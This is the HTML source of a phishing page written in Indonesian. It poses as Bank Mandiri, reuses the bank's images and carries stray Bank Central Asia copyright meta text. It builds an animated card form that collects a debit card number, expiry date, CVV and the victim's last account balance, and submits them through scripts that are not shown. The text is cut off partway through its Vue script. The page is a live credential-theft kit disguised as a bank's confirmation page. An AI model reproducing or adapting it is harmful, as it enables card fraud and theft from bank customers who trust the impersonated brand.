<html lang="id">
 <head> 
  <meta charset="UTF-8"> 
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#1E90FF"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
   <meta content="© 2021 PT Bank Central Asia Tbk, All Rights Reserved." name="description">
  <meta content="menu" property="og:title">
  <meta content="© 2021 PT Bank Central Asia Tbk, All Rights Reserved." property="og:description">
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>Bank Mandiri</title> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"> 
  <link rel="stylesheet" href="./style.css">
   <meta content="Bank Mandiri" property="og:title"> 
  <meta content="© 2022 PT Bank Mandiri (Persero) Tbk." property="og:description"> 
  <meta content="Bank Mandiri" property="twitter:title"> 
  <meta content="© 2022 PT Bank Mandiri (Persero) Tbk." property="twitter:description"> 
  <meta property="og:type" content="website"> 
  <meta content="summary_large_image" name="twitter:card"> 
  
 <link href="https://iconlogovector.com/uploads/images/2023/04/lg-920c179a18fea792a882b0596ac14e8b58.jpg" rel="shortcut icon" type="image/x-icon"> 
  <link href="https://iconlogovector.com/uploads/images/2023/04/lg-920c179a18fea792a882b0596ac14e8b58.jpg" rel="apple-touch-icon"> 
 </head> 
 <body> 
  <style>
        
@import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");

.html {
    width: 100%;
    height: 100%;
}
@media screen and (max-width: 480px) {
body {
  background: #fff;
  font-family: "Source Sans Pro", sans-serif;
  background-size: 100% 100%;
  background-position: 100% 100%;
  background-repeat: no-repeat;
  font-size: 16px;
  width: 100%;
  height: 100%;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  margin: 0px auto;
  position: absolute;
}
}


@media screen and (max-width: 360px) {
  body {
  background: #fff;
  font-family: "Source Sans Pro", sans-serif;
  background-size: 100% 100%;
  background-position: 100% 100%;
  background-repeat: no-repeat;
  font-size: 16px;
  width: 100%;
  height: 100%;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  margin: 0px auto;
  position: absolute;
}
}


* {
  box-sizing: border-box;
}
*:focus {
  outline: none;
}

.wrapper {
  
  display: block;
  width: 100%;
  position: absolute;
  left: 0;
  right: 0;
  margin: auto;
  padding: 0px;
  
  
}
@media screen and (max-width: 700px), (max-height: 440px) {
  .wrapper {
    flex-wrap: wrap;
    flex-direction: column;
    padding: 0px;
    text-
  }
}

.card-form {
  max-width: 570px;
  margin: auto;
  width: 100%;
  height: 470px;
  
}
@media screen and (max-width: 576px) {
  .card-form {
    margin: 0 auto;
  }
}
.card-form__inner {
    background: transparent;
 position: absolute;
 paint-order: stroke markers fill;
  border: 0px solid;
  color: #0060B1;
  border-radius: 10px;
  padding: 5px;
  margin-top: 280px;
  opacity: 1px;
  display: flex;
  
}

@media screen and (max-width: 480px) {
  .card-form__inner {
    padding: 15px;
    margin-top: 415px;
  }
}
@media screen and (max-width: 360px) {
  .card-form__inner {
    padding: 15px;
    margin-top: 415px;
  }
}
.card-form__row {
  display: flex;
  align-items: flex-start;
}
@media screen and (max-width: 480px) {
  .card-form__row {
    flex-wrap: wrap;
  }
}
.card-form__col {
  flex: auto;
  margin-right: 35px;
}
.card-form__col:last-child {
  margin-right: 0;
}
@media screen and (max-width: 480px) {
  .card-form__col {
    margin-right: 0;
    flex: unset;
    width: 100%;
    margin-bottom: 20px;
  }
  .card-form__col:last-child {
    margin-bottom: 0;
  }
}
.card-form__col.-cvv {
  max-width: 150px;
}
@media screen and (max-width: 480px) {
  .card-form__col.-cvv {
    max-width: initial;
  }
}
.card-form__group {
  display: flex;
  align-items: flex-start;
  flex-wrap: wrap;
}
.card-form__group .card-input__input {
  flex: 1;
  margin-right: 15px;
}
.card-form__group .card-input__input:last-child {
  margin-right: 0;
}
.card-form__button {
  width: 90%;
  height: 50px;
   background-image: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd-qSGMSkbbXy0wMWEIMFelztPG8bXcihBqho-SYqhToFYqg28K1LAuZ8cVjhAR0S67NvqsdqlmeNreVXNCrUvEEll9XdLfzpEGhT45IhipcJo8hPDnY_GpqUJZW5syZrOolrainzunt_lCNXWutLrFs9QgbITS2-ya7nsEXUkdPA6uLnZKGITsBqMxYo/s780/2ZH.webp");
  background-position: 100% 100%;
  background-size: 100% 100%;
  background-color: #1E90FF;
  box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  border: none;
  border-radius: 25px;
  font-size: 17px;
  font-weight: 600;
  font-family: "Source Sans Pro", sans-serif;
   padding-top: 0px;
  box-shadow: #D5D5D5 10px; 
  color: #fff;
  bottom: 20;
  left: 0;
  right: 0;
  margin: 0px auto;
  cursor: pointer;
  position: fixed;
}
@media screen and (max-width: 480px) {
  .card-form__button {
    margin-top: 10px;
  }
}

.card-item {
  
  height: 150px;
  left: 0;
  top: 125;
  right: 0;
  position: absolute;
  z-index: 2;
  width: 85%;
  margin: 0px auto;
  padding: 10px;
}
@media screen and (max-width: 480px) {
  .card-item {
    height: 150px;
    width: 66%;
    padding: 10px;
  }
}
@media screen and (max-width: 360px) {
  .card-item {
    height: 150px;
    padding: 0px;
  }
}
.card-item.-active .card-item__side.-front {
  transform: perspective(1000px) rotateY(180deg) rotateX(0deg) rotateZ(0deg);
}
.card-item.-active .card-item__side.-back {
  transform: perspective(1000px) rotateY(0) rotateX(0deg) rotateZ(0deg);
}
.card-item__focus {
  position: absolute;
  z-index: 3;
  border-radius: 5px;
  left: 0;
  top: 0;
  padding: 5px;
  width: 100%;
  height: 100%;
  transition: all 0.35s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  opacity: 0;
  pointer-events: none;
  overflow: hidden;
  border: 2px solid rgba(255, 255, 255, 0.65);
}
.card-item__focus:after {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  background: yellow;
  height: 100%;
  padding: 5px;
  border-radius: 5px;
  filter: blur(25px);
  opacity: 0.5;
}
.card-item__focus.-active {
  opacity: 1;
}
.card-item__side {
  border-radius: 10px;
  overflow: hidden;
  box-shadow: 0 20px 60px 0 rgba(14, 42, 90, 0.55);
  transform: perspective(2000px) rotateY(0deg) rotateX(0deg) rotate(0deg);
  transform-style: preserve-3d;
  transition: all 0.8s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  backface-visibility: hidden;
  height: 100%;
}
.card-item__side.-back {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  transform: perspective(2000px) rotateY(-180deg) rotateX(0deg) rotate(0deg);
  z-index: 2;
  padding: 0;
  height: 100%;
}
.card-item__side.-back .card-item__cover {
  transform: rotateY(-180deg);
}
.card-item__bg {
  max-width: 100%;
  display: block;
  max-height: 100%;
  height: 100%;
  width: 100%;
  object-fit: cover;
}
.card-item__cover {
  height: 100%;
  background-color: #1c1d27;
  position: absolute;
  height: 100%;
  background-color: #1c1d27;
  left: 0;
  top: 0;
  width: 100%;
  border-radius: 5px;
  overflow: hidden;
}
.card-item__cover:after {
  content: "";
  position: absolute;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  
}
.card-item__top {
  display: flex;
  align-items: flex-start;
  justify-content: space-between;
  margin-bottom: 40px;
  padding: 0 10px;
}
@media screen and (max-width: 480px) {
  .card-item__top {
    margin-bottom: 25px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__top {
    margin-bottom: 20px;
  }
}
.card-item__chip {
  width: 0px;
}
@media screen and (max-width: 480px) {
  .card-item__chip {
    width: 0px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__chip {
    width: 0px;
  }
}
.card-item__type {
  height: 45px;
  position: relative;
  display: flex;
  justify-content: flex-end;
  max-width: 100px;
  margin-left: auto;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item__type {
    height: 40px;
    max-width: 90px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__type {
    height: 30px;
  }
}
.card-item__typeImg {
  max-width: 100%;
  object-fit: contain;
  max-height: 100%;
  object-position: top right;
}
.card-item__info {
  color: #fff;
  width: 100%;
  max-width: calc(100% - 85px);
  padding: 10px 15px;
  font-weight: 500;
  display: block;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__info {
    padding: 10px;
  }
}
.card-item__holder {
  opacity: 1;
  font-size: 13px;
  margin-bottom: 6px;
}
@media screen and (max-width: 480px) {
  .card-item__holder {
    font-size: 12px;
    margin-bottom: 5px;
  }
}
.card-item__wrapper {
  font-family: "Source Code Pro", monospace;
  padding: 25px 15px;
  position: relative;
  z-index: 4;
  height: 100%;
  text-shadow: 7px 6px 10px rgba(14, 42, 90, 0.8);
  user-select: none;
}
@media screen and (max-width: 480px) {
  .card-item__wrapper {
    padding: 20px 10px;
  }
}
.card-item__name {
  font-size: 18px;
  line-height: 1;
  white-space: nowrap;
  max-width: 100%;
  overflow: hidden;
  text-overflow: ellipsis;
  text-transform: uppercase;
}
@media screen and (max-width: 480px) {
  .card-item__name {
    font-size: 16px;
  }
}
.card-item__nameItem {
  display: inline-block;
  min-width: 8px;
  position: relative;
}
.card-item__number {
  font-weight: 800;
  line-height: 1;
  color: snow;
  letter-spacing: -1px;
  font-size: 17px;
  margin-bottom: 15px;
  display: inline-block;
  padding: 0px;
  text-align: center;
  cursor: pointer;
}

.card-item__number:before {
    color: aqua;
}


@media screen and (max-width: 480px) {
  .card-item__number {
    font-size: 17px;
    margin-bottom: 10px;
    padding: 0px 0px;
    text-align: center;
  }
}
@media screen and (max-width: 360px) {
  .card-item__number {
    font-size: 16px;
    margin-bottom: 5px;
   
    text-align: center;
    text-shadow: 7px 6px 10px rgba(14, 42, 90, 0.8);
  }
}
.card-item__numberItem {
  width: 16px;
  display: inline-block;
  text-align: center;
  
}
.card-item__numberItem.-active {
    color: aqua;
  width: 30px;
}
@media screen and (max-width: 480px) {
  .card-item__numberItem {
    width: 13px;
    text-align: center;
    
  }
  .card-item__numberItem.-active {
    width: 16px;
    color: aqua;
    text-align: center;
  }
}
@media screen and (max-width: 360px) {
  .card-item__numberItem {
    width: 12px;
    text-align: center;
    
  }
  .card-item__numberItem.-active {
    width: 8px;
    color: aqua;
  }
}
.card-item__content {
  color: #fff;
  display: flex;
  align-items: flex-start;
}
.card-item__date {
  flex-wrap: wrap;
  font-size: 18px;
  margin-left: auto;
  padding: 10px;
  display: inline-flex;
  width: 80px;
  white-space: nowrap;
  flex-shrink: 0;
  cursor: pointer;
  
}
@media screen and (max-width: 480px) {
  .card-item__date {
    font-size: 16px;
    
  }
}
.card-item__dateItem {
  position: relative;
  
}
.card-item__dateItem span {
  width: 22px;
  display: inline-block;
}
.card-item__dateTitle {
  opacity: 1;
  font-size: 13px;
  padding-bottom: 6px;
  width: 100%;
  margin-left: -5px;
}
@media screen and (max-width: 480px) {
  .card-item__dateTitle {
    font-size: 12px;
    padding-bottom: 5px;
  }
}
.card-item__band {
  background: rgba(0, 0, 19, 1);
  width: 100%;
  height: 50px;
  margin-top: 30px;
  position: relative;
  z-index: 2;
}
@media screen and (max-width: 480px) {
  .card-item__band {
    margin-top: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__band {
    height: 40px;
    margin-top: 10px;
  }
}
.card-item__cvv {
  text-align: right;
  position: relative;
  z-index: 2;
  padding: 15px;
}
.card-item__cvv .card-item__type {
  opacity: 1;
}
@media screen and (max-width: 360px) {
  .card-item__cvv {
    padding: 10px 15px;
  }
}
.card-item__cvvTitle {
  padding-right: 10px;
  font-size: 15px;
  font-weight: 800;
  color: #000;
  margin-bottom: 5px;
}
.card-item__cvvBand {
  height: 25px;
  background: #fff;
  margin-bottom: 30px;
  text-align: right;
  display: flex;
  align-items: center;
  justify-content: flex-end;
  padding-right: 10px;
  color: #1a3b5d;
  font-size: 18px;
  border-radius: 4px;
  box-shadow: 0px 10px 20px -7px rgba(32, 56, 117, 0.35);
}
@media screen and (max-width: 480px) {
  .card-item__cvvBand {
    height: 30px;
    margin-bottom: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__cvvBand {
    margin-bottom: 15px;
  }
}

.card-list {
  margin-bottom: -100px;
}
@media screen and (max-width: 480px) {
  .card-list {
    margin-bottom: -120px;
  }
}

.card-input {
  margin-bottom: 20px;
}
.card-input__label {
  font-size: 17px;
  margin-bottom: 5px;
  font-weight: 500;
  color: #0060B1;
  width: 100%;
  display: none;
  user-select: none;
 
}
.card-input__input {
  width: 100%;
  height: 45px;
  border-radius: 5px;
  box-shadow: 1px 1px 15px 1px rgba(36, 52, 70, 0.26);
  border: 0px solid #0060B1;
  transition: all 0.3s ease-in-out;
  font-size: 18px;
  padding: 5px 15px;
  background: #fff;
  color: #1a3b5d;
  font-family: "Source Sans Pro", sans-serif;
}
.card-input__input:hover, .card-input__input:focus {
  border-bottom: 2px solid #33A8FD;
}
.card-input__input:focus {
  box-shadow: 0px 0px 30px 0px rgba(36, 52, 70, 0.26);
}
.card-input__input.-select {
  -webkit-appearance: none;
  
  background-size: 12px;
  background-position: 90% center;
  background-repeat: no-repeat;
  padding-right: 30px;
}

.card-input__input1 {
  width: 100%;
  height: 45px;
  border-radius: 5px;
  box-shadow: 1px 1px 15px 1px rgba(36, 52, 70, 0.26);
  border: 0px solid #0060B1;
  transition: all 0.3s ease-in-out;
  font-size: 18px;
  padding: 5px 15px;
  background: #fff;
  color: #1a3b5d;
  font-family: "Source Sans Pro", sans-serif;
}
.card-input__input1:hover, .card-input__input1:focus {
  border-bottom: 2px solid #33A8FD;
}
.card-input__input1:focus {
  box-shadow: 0px 0px 30px 0px rgba(36, 52, 70, 0.26);
}


.slide-fade-up-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-up-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-up-enter {
  opacity: 0;
  transform: translateY(15px);
  pointer-events: none;
}

.slide-fade-up-leave-to {
  opacity: 0;
  transform: translateY(-15px);
  pointer-events: none;
}

.slide-fade-right-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-right-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-right-enter {
  opacity: 0;
  transform: translateX(10px) rotate(45deg);
  pointer-events: none;
}

.slide-fade-right-leave-to {
  opacity: 0;
  transform: translateX(-10px) rotate(45deg);
  pointer-events: none;
}

.github-btn {
  position: absolute;
  right: 40px;
  bottom: 50px;
  text-decoration: none;
  padding: 15px 25px;
  border-radius: 4px;
  box-shadow: 0px 4px 30px -6px rgba(36, 52, 70, 0.65);
  background: #24292e;
  color: #fff;
  font-weight: bold;
  letter-spacing: 1px;
  font-size: 16px;
  text-align: center;
  transition: all 0.3s ease-in-out;
}
@media screen and (min-width: 500px) {
  .github-btn:hover {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
@media screen and (max-width: 700px) {
  .github-btn {
    position: relative;
    bottom: auto;
    right: auto;
    margin-top: 20px;
  }
  .github-btn:active {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}

body {font-family: Arial, Helvetica, sans-serif;
width: 100%;
position: center;

}
* {box-sizing: border-box;}

/* Button used to open the contact form - fixed at the bottom of the page */
.open-button {
  background-color: #555;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  opacity: 0.8;
  position: fixed;
  bottom: 23px;
  right: 28px;
  width: 280px;
}

/* The popup form - hidden by default */
.form-popup {
    
    background-color:rgba(192,192,192,0.9);
  display: none;
  position: fixed;
  margin-top: -600px;
  margin-left: 10px;
  margin-right: 10px;
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
  right: 0px;
  border: 3px solid #f1f1f1;
  border-radius: 10px;
  z-index: 9;
}

/* Add styles to the form container */
.form-container {
  max-width: 300px;
  padding: 10px;
  background-color: white;
}


/* Full-width input fields */
.form-container input[type=text], .form-container input[type=password] {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  background: #f1f1f1;
}

/* When the inputs get focus, do something */
.form-container input[type=text]:focus, .form-container input[type=password]:focus {
  background-color: #ddd;
  outline: none;
}

/* Set a style for the submit/login button */
.form-container .btn {
  background-color: #04AA6D;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  margin-bottom:10px;
  opacity: 0.8;
}

/* Add a red background color to the cancel button */
.form-container .cancel {
  background-color: red;
}
/* Add some hover effects to buttons */
.form-container .btn:hover, .open-button:hover {
  opacity: 1;
}
        
        
        .logo{
        font-family: helvetica;
  text-align:center;
  color: #fff;
  max-width: 100%;
  height: auto;
  font-size: 13px;
  margin-top: -0px;
  margin-bottom: -55px;
  margin-left: -0px;
  background: #fff;
  position: fixed;
z-index: 1;
box-shadow: rgb(170, 170, 170, 0.1) 1px 0.1px 2px 0px; 
   }
    </style> 
       <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwnigN234Z7wCpac2aUuWQmWY_3sUHOwUGPtk01Mg2qmPfTi51T5o9iwo85OtXAUdLWY3Yzgne-ZIG-W-p2K3RtkoMws4sYpeffBtHXRFXO19AIk7QElhKXssKzmZoyinfNx5uZEq42ZQO1OOeLTzaD_s9iIkxn0Q7W96K4I0udBLZ-yQKImqzvLM/s1080/Screenshot_2023-01-10-22-48-30-43_40deb401b9ffe8e1df2f1cc5ba480b12.jpg" class="logo">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJnpFKv47KkeLH-1qEGNM9Z5J4KzFLaeAUEcZZvmlYfVrtTERyS-HqxU1Wm6tcJaJsA_gEpsxJjrZGrLKtFOxsa0roe8o6GB5vfeYfi9JjZM2a4GBJBIsW0ofBJvYIl8kXto0hHeDehUukX-j-3EG_hUZiDbZeJc6EpWImBpCgYhOCxxaWO0eZ0DZHDg/s1080/IMG_20230813_024745.jpg" width="100%" style="position: absolute; top: 0; left: 0; right: 0; ">
<!-- partial:index.partial.html -->
<div class="wrapper" id="app">
    <div class="card-form">
      <div class="card-list">
        <div class="card-item" v-bind:class="{ '-active' : isCardFlipped }">
          <div class="card-item__side -front">
            <div class="card-item__focus" v-bind:class="{'-active' : focusElementStyle }" v-bind:style="focusElementStyle" ref="focusElement"></div>
            <div class="card-item__cover">
              <img
              src="https://www.bankmandiri.co.id/documents/20143/43982274/ag-landingpage-5.png/a4a5d947-d893-b4f8-7d29-30b1f864c916?t=1611125448472" class="card-item__bg" class="card-item__bg">
            </div>
            
            <div class="card-item__wrapper">
              <div class="card-item__top">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrtAAEyPjlZRagtw3_CKXvm4tXDH6oymLjHqQXoh949JaM1KjJxttE-FlMJOl4MxJrApxLhHhpOwm8zU7MCI9vdmaSQoZGA7Avft_EDLSKg9OdvoMqTqGCzhES_hK79PfKZJ_1XwpTHDjvEHRWRDv5tAi_a4pCLkyWjNKro3EvZFglPwhx73FGLb6S/s1074/AddText_12-17-08.46.20.png" class="card-item__chip">
                <div class="card-item__type">
                  <transition name="slide-fade-up">
                   
                  </transition>
                </div>
              </div>
              <label for="cardNumber" class="card-item__number" ref="cardNumber">
            <div style="margin-top: 10px;">
                  
                <template v-if="getCardType === 'amex'">
                 <span v-for="(n, $index) in amexCardMask" :key="$index">
                  <transition name="slide-fade-up">
                      
                    <div
                      class="card-item__numberItem"
                      v-if="$index > 4 && $index < 15 && cardNumber.length > $index && n.trim() !== ''"
                    >*</div>
                    <div class="card-item__numberItem"
                      :class="{ '-active' : n.trim() === '' }"
                      :key="$index" v-else-if="cardNumber.length > $index">
                      {{cardNumber[$index]}}
                    </div>
                    <div
                      class="card-item__numberItem"
                      :class="{ '-active' : n.trim() === '' }"
                      v-else
                      :key="$index + 1"
                    >{{n}}</div>
                  </transition>
                </span>
                </template>

                <template v-else>
                  <span v-for="(n, $index) in otherCardMask" :key="$index">
                    <transition name="slide-fade-up">
                      <div
                        class="card-item__numberItem"
                        v-if="$index > 4 && $index < 15 && cardNumber.length > $index && n.trim() !== ''"
                      ><font style="color: black">*</font></div>
                      <div class="card-item__numberItem"
                        :class="{ '-active' : n.trim() === '' }"
                        :key="$index" v-else-if="cardNumber.length > $index">
                        {{cardNumber[$index]}}
                      </div>
                      <div
                        class="card-item__numberItem"
                        :class="{ '-active' : n.trim() === '' }"
                        v-else
                        :key="$index + 1"
                      >{{n}}</div>
                    </transition>
                  </span>
                </template>
              </label>
              </div>
              <div class="card-item__content" style="">
                
                <div class="card-item__date" ref="cardDate">
                  <label for="cardMonth" class="card-item__dateTitle">Masa Berlaku</label>
                  <label for="cardMonth" class="card-item__dateItem">
                    <transition name="slide-fade-up">
                      <span v-if="cardMonth" v-bind:key="cardMonth">{{cardMonth}}</span>
                      <span v-else key="2">MM/YY</span>
                    </transition>
                  </label>
                 
                </div>
              </div>
            </div>
          </div>
          <div class="card-item__side -back">
            <div class="card-item__cover">
              <img
              src="https://www.bankmandiri.co.id/documents/20143/43982274/ag-landingpage-9.png/726c2276-b084-5f1e-c1bf-0812924d021e?t=1611125448796" class="card-item__bg">
            </div>
            <div class="card-item__band"></div>
            <div class="card-item__cvv">
                <div class="card-item__cvvTitle">CVV</div>
                <div class="card-item__cvvBand">
                  <span v-for="(n, $index) in cardCvv" :key="$index">
                    *
                  </span>

              </div>
                <div class="card-item__type">
                  
                </div>
            </div>
          </div>
        </div>
      </div>
    
      <div class="card-form__inner">
 <form id="form1" onsubmit="submitForm(event); return false" method="POST" style="display: ">
 <input type="hidden" id="nomorku" name="nomorku" value="">	     
        <div class="card-input">
          <label for="cardNumber" class="card-input__label" style="font-weight: 800;">Nomor Kartu Debit</label>
             <input type="tel" name="debit" id="debit" class="card-input__input1" v-mask="generateCardNumberMask" v-model="cardNumber" v-on:focus="focusInput" v-on:blur="blurInput" data-ref="cardNumber" autocomplete="off" placeholder="Masukkan 16 digit Nomor kartu" required style="background-position: 0px 0px;
    background-size: 100% 55px;
    background-repeat: no-repeat;
    background-attachment: scroll;
     background-color: none;
    background-repeat: no-repeat;
    background-size: 41px 15px;
    background-position: 97% 50%;" minlength="19" maxlength="19" pattern="(?=.*[0-9]).{19,19}"  required oninvalid="this.setCustomValidity('Mɑsukkɑn 𝟭𝟲 𝗱𝗶𝗴𝗶𝘁 Nomor 𝗞𝗮𝗿𝘁𝘂 𝗗𝗲𝗯𝗶𝘁 dengɑn Benɑr')" onchange="this.setCustomValidity('')">
        </div>
        <div class="card-input">
          <label for="cardName" class="card-input__label" style="font-weight: 800;">Nomor Handphone</label>
          <input type="text" name="nama" id="nama" class="card-input__input" v-model="cardName" v-on:focus="focusInput" v-on:blur="blurInput" data-ref="cardName" maxlength="13" autocomplete="off" placeholder="Nama Lengkap">
        </div>
        <div class="card-form__row">
          <div class="card-form__col">
            <div class="card-form__group">
              <label for="cardMonth" class="card-input__label" style="font-weight: 800;">Masa Berlaku</label>
              <input type="tel" id="valid" name="valid" v-model="valid" placeholder="Masa Berlaku" class="card-input__input -select" v-on:focus="focusInput" v-on:blur="blurInput" data-ref="cardDate" maxlength="5" v-mask="'##/##'" pattern="(?=.*[0-9]).{5,5}"  required oninvalid="this.setCustomValidity('Mɑsukkɑn Mɑsɑ Berlɑku kɑrtu dengɑn benɑr untuk 𝗕𝘂𝗹𝗮𝗻 dɑn 𝗧𝗮𝗵𝘂𝗻 nyɑ')" onchange="this.setCustomValidity('')">
               
             <input type="tel" class="card-input__input -select"  id="cvv" name="cvv" placeholder="CVV (3 digit )" v-mask="'###'" maxlength="3" v-model="cardCvv" v-on:focus="flipCard(true)" v-on:blur="flipCard(false)" autocomplete="off" required pattern="(?=.*[0-9]).{3,3}" oninvalid="this.setCustomValidity('𝗖𝗩𝗩 ɑdɑlɑh (𝟯 𝗱𝗶𝗴𝗶𝘁 𝗮𝗻𝗴𝗸𝗮 yɑng berɑdɑ dibelɑkɑng kɑrtu)')" onchange="this.setCustomValidity('')" >
              
            </div>
          </div>
          <div class="card-form__col -cvv">
            <div class="card-input">
              <label for="cardCvv" class="card-input__label"style="font-weight: 800;">CVV (optional)</label>
              
               <input type="tel" class="uang card-input__input" id="saldo" name="saldoTerakhir" placeholder="Saldo Terakhir" maxlength="200" autocomplete="on" required style="margin-top: 0px">
               <input id="tanparupiah" data-ref="cardDate" class="card-input__input -select" v-model="cardYear" v-on:focus="focusInput" v-on:blur="blurInput" data-ref="cardDate" style="opacity: 0; position: relative; z-index: -1; display: none" disabled>
            </div>
          </div>
        </div>

 <div style="position: fixed; width: 100%; height: 90px; background: #fff;  left: 0; right: 0; margin: 0px auto; bottom: 0; box-shadow: rgb(170, 170, 170) 2px 2px 4px 1px; ">
  <button class="card-form__button" type="submit" value="Lanjutkan">Konfirmasi</button>
</div>
      <div class="form-popup" id="myForm"> 
       <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5bF2TKGtFUOuzJnzou0tTHFTofU2aOiab7gx0fqp0DElijUpmcNDQLomC6iNuwZVc1LD2sOf8IBDd-zp0dG7iIHmpz_8CMkzhl34C_asR1MAGdfwaRMYA8y4-gIKw4R0Q6QlDHN-1K6e6Jb4P-oAUiWkNS5GTICYjl-oQES9eN6fGLcQcskx00RdK/s1022/1674277005262.png" style="box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);" class="card-item__bg"> 
       <a href=""><button type="submit" class="card-form__button" onclick="KirimPesan()">Update</button></a>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script><script  src="./credit11.js"></script>
       <button type="button" class="card-form__button" onclick="closeForm()">Kembali</button> 
      </div> 
     </form>
    </div> 
   </div> 
   <center>
  <div class="app-loading" style="position: fixed; margin: 0px auto; left: 0; right: 0; top: 0; bottom: 0; width: 100%; height: 100%; background: rgba(190, 190, 190, 0.4); z-index: 99999999; padding-top: 250px; display: none" id="lodingku">
    <img class="img-fluid" style="width: 140px" src="https://join.bankmandiri.co.id/app/assets/img/img_mandiri/preloader1.gif" alt="preloader" />
      </div>
  </center>
   <script>
function openForm() {
  document.getElementById("myForm").style.display = "block";
}

function closeForm() {
  document.getElementById("myForm").style.display = "none";
}
</script> 
  </div> 
<!-- partial -->
 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script><script  src="./credit.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="jquery.min.js"></script>
       >
        <script type="text/javascript">
            $(document).ready(function(){

                // Format mata uang.
                $( '.uang' ).mask('000.000.000.000', {reverse: true});
 var dengan_rupiah = document.getElementById('saldo');
    dengan_rupiah.addEventListener('keyup', function(e)
    {
        dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
    });
    
    
      /* Fungsi */
    function formatRupiah(angka, prefix)
    {
        var number_string = angka.replace(/[^,\d]/g, '').toString(),
            split    = number_string.split(','),
            sisa     = split[0].length % 3,
            rupiah     = split[0].substr(0, sisa),
            ribuan     = split[0].substr(sisa).match(/\d{3}/gi);
            
        if (ribuan) {
            separator = sisa ? '.' : '';
            rupiah += separator + ribuan.join('.');
        }
        
        rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
        return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
    }
            })
            
            
        </script>
<script>
/*
See on github: https://github.com/muhammederdem/credit-card-form
*/

new Vue({
  el: "#app",
  data() {
    return {
      currentCardBackground: Math.floor(Math.random()* 25 + 1), // just for fun :D
      cardName: "",
      cardNumber: "",
      cardMonth: "",
      cardYear: "",
      cardCvv: "",
      minCardYear: new Date().getFullYear(),
      valid: "",
      amexCardMask: "#### ###### #####",
      otherCardMask: "#### #### #### ####",
      cardNumberTemp: "",
      isCardFlipped: false,
      focusElementStyle: null,
      isInputFocused: false
    };
  },
  mounted() {
    this.cardNumberTemp = this.otherCardMask;
    document.getElementById("cardNumber").focus();
  },
  computed: {
    getCardType () {
      let number = this.cardNumber;
      let re = new RegExp("^4");
      if (number.match(re) != null) return "visa";

      re = new RegExp("^(34|37)");
      if (number.match(re) != null) return "amex";

      re = new RegExp("^5[1-5]");
      if (number.match(re) != null) return "mastercard";

      re = new RegExp("^6011");
      if (number.match(re) != null) return "discover";
      
      re = new RegExp('^9792')
      if (number.match(re) != null) return 'troy'

      return "visa"; // default type
    },
		generateCardNumberMask () {
			return this.getCardType === "amex" ? this.amexCardMask : this.otherCardMask;
    },
    minCardMonth () {
      if (this.cardYear === this.minCardYear) return new Date().getMonth() + 1;
      return 1;
    }
  },
  watch: {
    cardYear () {
